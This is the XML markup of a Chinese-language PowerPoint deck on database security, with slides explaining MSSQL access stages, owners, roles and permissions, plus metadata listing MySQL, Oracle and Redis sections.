              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"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rPr>
              <a:t>THANK YOU  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="auto">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"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rPr>
              <a:t>FOR YOUR ATTENTION!</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"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endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="77828" name="TextBox 5"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="9264823" y="188913"/>
            <a:ext cx="2663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联系我们  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>400 070 6887</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6383338" y="2082800"/>
            <a:ext cx="2443162" cy="769938"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr fontAlgn="auto">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="65000"/>
                    <a:lumOff val="35000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Adobe 黑体 Std R" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Adobe 黑体 Std R" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>感谢观看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4896544"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>对象级别安全机制</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>对象安全性检查是数据库管理系统的最后一个安全等级。创建数据库对象时，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>mssql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>将自动把该数据库对象的用户权限赋予该对象的所有者，对象的拥有者可以实现该对象的安全控制。数据库对象访问权限定义了用户对数据库中数据对象的引用、数据操作语句的许可权限，这通过定义对象和语句的许可权限来实现。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>用户访问的三个阶段</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>第一阶段：用户登录到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>mssql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>的实例进行身份鉴别，被确认合法才能登录到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>mssql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>实例。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>·</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>第二阶段：用户在每个要访问的数据库里必须有一个账号，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>mssql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>实例将登录映射到数据库用户账号上，在这个数据库的账号上定义数据库的管理和数据对象访问的安全策略。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>·</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>第三阶段：检查用户是否具有访问数据库对象、执行操作的权限，经过语句许可权限的验证，才能够实现对数据的操作。</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安全机制介绍</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="57420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767408" y="1556792"/>
            <a:ext cx="10972800" cy="4896544"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>数据库所有者</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>数据库所有者（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>DBO</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>）是数据库的创建者，每个数据库只有一个数据库所有者。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>DBO</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>有数据库中的所有特权，可以提供给其他用户访问权限。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>数据库对象</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>数据库对象包含表、索引、视图、触发器、规则和存储过程，创建数据库对象的用户是数据库对象的所有者，数据库对象可以授予其他用户使用其拥有对象的权利。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>域</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>域是一组计算机的集合，它们可以共享一个通用安全性数据库。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>数据库组</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>数据库组是一组数据库用户的集合。这些用户接受相同的数据库用户许可。使用组可以简化大量数据库用户的管理，组提供了让大量用户授权和取消许可的一种简便方法。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>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基本安全术语</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="257264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err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>Mssql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>数据库</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="内容占位符 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="695400" y="1628800"/>
            <a:ext cx="10972800" cy="4896544"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>系统管理员</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>系统管理员是负责管理</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>mssql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>全面性能和综合应用的管理员，简称</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>sa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>。系统管理员的工作包括安装</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>mssql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>、配置服务器、管理和监视磁盘空间、内存和连接的使用、创建设备和数据库、确认用户和授权许可、从</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>mssql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>数据库导入导出数据、备份和恢复数据库、实现和维护复制调度任务、监视和调配</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>mssql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>性能、诊断系统问题等</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>许可</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>使用许可可以增强数据库的安全性，许可系统指定哪些用户被授予使用哪些数据库对象的操作，指定许可的能力由每个用户的状态（系统管理员、数据库所有者或者数据库对象所有者）决定</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>角色</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>角色中包含了</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>mssql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>预定义的一些特殊权限，可以将角色分别授予不同的主体。使用角色可以提供有效而复杂的安全模型，以及管理可保护对象的访问权限。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>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err="1"/>
              <a:t>Mssql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>基本安全术语</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="41413957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谷安模板-1.potx" id="{20370F93-E01C-46B9-8133-FC051707147A}" vid="{288D7D58-60AC-41C3-82B0-33C6BDCAB98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谷安模板-1</Template>
  <TotalTime>23158</TotalTime>
  <Words>7924</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>宽屏</PresentationFormat>
  <Paragraphs>678</Paragraphs>
  <Slides>66</Slides>
  <Notes>64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66</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="78" baseType="lpstr">
      <vt:lpstr>Adobe 黑体 Std R</vt:lpstr>
      <vt:lpstr>Arial Unicode MS</vt:lpstr>
      <vt:lpstr>黑体</vt:lpstr>
      <vt:lpstr>华文新魏</vt:lpstr>
      <vt:lpstr>华文中宋</vt:lpstr>
      <vt:lpstr>楷体</vt:lpstr>
      <vt:lpstr>宋体</vt:lpstr>
      <vt:lpstr>微软雅黑</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>Office 主题</vt:lpstr>
      <vt:lpstr>数据库安全</vt:lpstr>
      <vt:lpstr>知识体系</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Mssql数据库</vt:lpstr>
      <vt:lpstr>Mysql数据库</vt:lpstr>
      <vt:lpstr>Mysql数据库</vt:lpstr>
      <vt:lpstr>Mysql数据库</vt:lpstr>
      <vt:lpstr>Mysql数据库</vt:lpstr>
      <vt:lpstr>Mysql数据库</vt:lpstr>
      <vt:lpstr>Mysql数据库</vt:lpstr>
      <vt:lpstr>Mysql数据库</vt:lpstr>
      <vt:lpstr>Mysql数据库</vt:lpstr>
      <vt:lpstr>Mysql数据库</vt:lpstr>
      <vt:lpstr>Mysql数据库</vt:lpstr>
      <vt:lpstr>Mysql数据库</vt:lpstr>
      <vt:lpstr>Mysql数据库</vt:lpstr>
      <vt:lpstr>Mysql数据库</vt:lpstr>
      <vt:lpstr>Mysql数据库</vt:lpstr>
      <vt:lpstr>Mysql数据库</vt:lpstr>
      <vt:lpstr>ORACRL数据库</vt:lpstr>
      <vt:lpstr>ORACRL数据库</vt:lpstr>
      <vt:lpstr>ORACRL数据库</vt:lpstr>
      <vt:lpstr>ORACRL数据库</vt:lpstr>
      <vt:lpstr>ORACRL数据库</vt:lpstr>
      <vt:lpstr>ORACRL数据库</vt:lpstr>
      <vt:lpstr>ORACRL数据库</vt:lpstr>
      <vt:lpstr>ORACRL数据库</vt:lpstr>
      <vt:lpstr>ORACRL数据库</vt:lpstr>
      <vt:lpstr>ORACRL数据库</vt:lpstr>
      <vt:lpstr>ORACRL数据库</vt:lpstr>
      <vt:lpstr>ORACRL数据库</vt:lpstr>
      <vt:lpstr>Redis数据库</vt:lpstr>
      <vt:lpstr>Redis数据库</vt:lpstr>
      <vt:lpstr>Redis数据库-知识子域</vt:lpstr>
      <vt:lpstr>Redis数据库-知识子域</vt:lpstr>
      <vt:lpstr>Redis数据库-知识子域</vt:lpstr>
      <vt:lpstr>Redis数据库-知识子域</vt:lpstr>
      <vt:lpstr>Redis数据库-知识子域</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Linux系统管理与安全</dc:title>
  <dc:creator>高智震</dc:creator>
  <cp:lastModifiedBy>yu</cp:lastModifiedBy>
  <cp:revision>2823</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2015-08-23T14:03:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2017-10-08T15:06:00Z</dcterms:modified>
</cp:coreProperties>
</file>